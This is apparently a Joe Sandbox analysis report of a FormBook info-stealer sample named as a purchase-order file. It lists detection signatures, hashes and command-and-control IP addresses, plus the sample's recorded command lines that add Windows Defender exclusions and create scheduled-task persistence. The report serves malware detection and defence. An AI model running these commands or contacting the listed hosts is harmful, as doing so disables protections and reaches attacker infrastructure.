Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_P.O.1212024.scr

Overview

General Information

Sample name:RFQ_P.O.1212024.scr
Analysis ID:1573579
MD5:bc03b7d0cc3faa356f5c49609d150b44
SHA1:687546140c750b9b466f8da86c63cff613b727a2
SHA256:36389326c697d43ecf27b181b4ec997ffc45aa8b1cdca0cca34db3d43075cccd
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • RFQ_P.O.1212024.scr (PID: 3236 cmdline: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S MD5: BC03B7D0CC3FAA356F5C49609D150B44)
    • powershell.exe (PID: 3348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • schtasks.exe (PID: 3412 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • RegSvcs.exe (PID: 3580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
      • mrNbohrgjTw.exe (PID: 1696 cmdline: "C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msinfo32.exe (PID: 3736 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5F2122888583347C9B81724CF169EFC6)
          • mrNbohrgjTw.exe (PID: 1020 cmdline: "C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1372 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • taskeng.exe (PID: 3616 cmdline: taskeng.exe {5B36C18D-91BD-4673-848D-E2536B74881F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • PEJmengI.exe (PID: 3660 cmdline: C:\Users\user\AppData\Roaming\PEJmengI.exe MD5: BC03B7D0CC3FAA356F5C49609D150B44)
      • powershell.exe (PID: 3764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3876 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 4008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", ProcessId: 3348, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", ProcessId: 3348, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PEJmengI.exe, ParentImage: C:\Users\user\AppData\Roaming\PEJmengI.exe, ParentProcessId: 3660, ParentProcessName: PEJmengI.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp", ProcessId: 3876, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", ProcessId: 3412, ProcessName: schtasks.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msinfo32.exe, ProcessId: 3736, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", ProcessId: 3348, ProcessName: powershell.exe
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Local\Temp\gzkbfl5i.z03.ps1

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", ProcessId: 3412, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T10:20:15.987054+010028554651A Network Trojan was detected192.168.2.224916585.159.66.9380TCP
                2024-12-12T10:20:41.230424+010028554651A Network Trojan was detected192.168.2.2249170188.114.97.680TCP
                2024-12-12T10:20:56.248123+010028554651A Network Trojan was detected192.168.2.224917485.25.177.13880TCP
                2024-12-12T10:21:38.255907+010028554651A Network Trojan was detected192.168.2.2249178173.236.199.9780TCP
                2024-12-12T10:21:52.962627+010028554651A Network Trojan was detected192.168.2.2249182203.161.42.7380TCP
                2024-12-12T10:22:07.657112+010028554651A Network Trojan was detected192.168.2.224918646.30.211.3880TCP
                2024-12-12T10:22:22.262702+010028554651A Network Trojan was detected192.168.2.224919077.68.64.4580TCP
                2024-12-12T10:22:37.055660+010028554651A Network Trojan was detected192.168.2.2249194146.88.233.11580TCP
                2024-12-12T10:22:52.139890+010028554651A Network Trojan was detected192.168.2.2249198217.160.0.20080TCP
                2024-12-12T10:23:06.585920+010028554651A Network Trojan was detected192.168.2.224920213.248.169.4880TCP
                2024-12-12T10:23:21.384078+010028554651A Network Trojan was detected192.168.2.224920681.2.196.1980TCP
                2024-12-12T10:23:36.102417+010028554651A Network Trojan was detected192.168.2.2249210172.67.215.23580TCP
                2024-12-12T10:23:51.985546+010028554651A Network Trojan was detected192.168.2.2249214172.67.145.23480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T10:20:32.108922+010028554641A Network Trojan was detected192.168.2.2249167188.114.97.680TCP
                2024-12-12T10:20:35.908998+010028554641A Network Trojan was detected192.168.2.2249168188.114.97.680TCP
                2024-12-12T10:20:37.427008+010028554641A Network Trojan was detected192.168.2.2249169188.114.97.680TCP
                2024-12-12T10:20:47.127778+010028554641A Network Trojan was detected192.168.2.224917185.25.177.13880TCP
                2024-12-12T10:20:50.940626+010028554641A Network Trojan was detected192.168.2.224917285.25.177.13880TCP
                2024-12-12T10:20:52.440634+010028554641A Network Trojan was detected192.168.2.224917385.25.177.13880TCP
                2024-12-12T10:21:29.308577+010028554641A Network Trojan was detected192.168.2.2249175173.236.199.9780TCP
                2024-12-12T10:21:32.951377+010028554641A Network Trojan was detected192.168.2.2249176173.236.199.9780TCP
                2024-12-12T10:21:34.621628+010028554641A Network Trojan was detected192.168.2.2249177173.236.199.9780TCP
                2024-12-12T10:21:43.897784+010028554641A Network Trojan was detected192.168.2.2249179203.161.42.7380TCP
                2024-12-12T10:21:47.642319+010028554641A Network Trojan was detected192.168.2.2249180203.161.42.7380TCP
                2024-12-12T10:21:49.211359+010028554641A Network Trojan was detected192.168.2.2249181203.161.42.7380TCP
                2024-12-12T10:21:58.559422+010028554641A Network Trojan was detected192.168.2.224918346.30.211.3880TCP
                2024-12-12T10:22:02.353248+010028554641A Network Trojan was detected192.168.2.224918446.30.211.3880TCP
                2024-12-12T10:22:03.875968+010028554641A Network Trojan was detected192.168.2.224918546.30.211.3880TCP
                2024-12-12T10:22:13.161120+010028554641A Network Trojan was detected192.168.2.224918777.68.64.4580TCP
                2024-12-12T10:22:16.929242+010028554641A Network Trojan was detected192.168.2.224918877.68.64.4580TCP
                2024-12-12T10:22:18.506959+010028554641A Network Trojan was detected192.168.2.224918977.68.64.4580TCP
                2024-12-12T10:22:27.923190+010028554641A Network Trojan was detected192.168.2.2249191146.88.233.11580TCP
                2024-12-12T10:22:31.731906+010028554641A Network Trojan was detected192.168.2.2249192146.88.233.11580TCP
                2024-12-12T10:22:33.240523+010028554641A Network Trojan was detected192.168.2.2249193146.88.233.11580TCP
                2024-12-12T10:22:42.957238+010028554641A Network Trojan was detected192.168.2.2249195217.160.0.20080TCP
                2024-12-12T10:22:46.772124+010028554641A Network Trojan was detected192.168.2.2249196217.160.0.20080TCP
                2024-12-12T10:22:48.326210+010028554641A Network Trojan was detected192.168.2.2249197217.160.0.20080TCP
                2024-12-12T10:22:57.560387+010028554641A Network Trojan was detected192.168.2.224919913.248.169.4880TCP
                2024-12-12T10:23:01.251058+010028554641A Network Trojan was detected192.168.2.224920013.248.169.4880TCP
                2024-12-12T10:23:02.938092+010028554641A Network Trojan was detected192.168.2.224920113.248.169.4880TCP
                2024-12-12T10:23:12.245501+010028554641A Network Trojan was detected192.168.2.224920381.2.196.1980TCP
                2024-12-12T10:23:16.058770+010028554641A Network Trojan was detected192.168.2.224920481.2.196.1980TCP
                2024-12-12T10:23:17.565888+010028554641A Network Trojan was detected192.168.2.224920581.2.196.1980TCP
                2024-12-12T10:23:26.993563+010028554641A Network Trojan was detected192.168.2.2249207172.67.215.23580TCP
                2024-12-12T10:23:30.781995+010028554641A Network Trojan was detected192.168.2.2249208172.67.215.23580TCP
                2024-12-12T10:23:32.310126+010028554641A Network Trojan was detected192.168.2.2249209172.67.215.23580TCP
                2024-12-12T10:23:42.502367+010028554641A Network Trojan was detected192.168.2.2249211172.67.145.23480TCP
                2024-12-12T10:23:46.671806+010028554641A Network Trojan was detected192.168.2.2249212172.67.145.23480TCP
                2024-12-12T10:23:48.237742+010028554641A Network Trojan was detected192.168.2.2249213172.67.145.23480TCP
                2024-12-12T10:23:57.760685+010028554641A Network Trojan was detected192.168.2.224921569.48.179.23880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T10:20:35.908998+010028563181A Network Trojan was detected192.168.2.2249168188.114.97.680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: RFQ_P.O.1212024.scrVirustotal: Detection: 38%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: RFQ_P.O.1212024.scrJoe Sandbox ML: detected
                Source: RFQ_P.O.1212024.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ_P.O.1212024.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: msinfo32.pdb source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb@ source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrNbohrgjTw.exe, 0000000B.00000000.379719754.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873854822.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: RegSvcs.pdb, source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002010000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396847773.0000000001E80000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396514209.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002190000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.415871928.000000000094C000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_00659876
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_006598E8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_00659C97
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_0065989A
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_00659922
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C94DE
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C9128
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C90DA
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C90B6
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C9162
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C95B9
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C934A

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.22:49168 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49165 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49178 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49196 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49203 -> 81.2.196.19:80
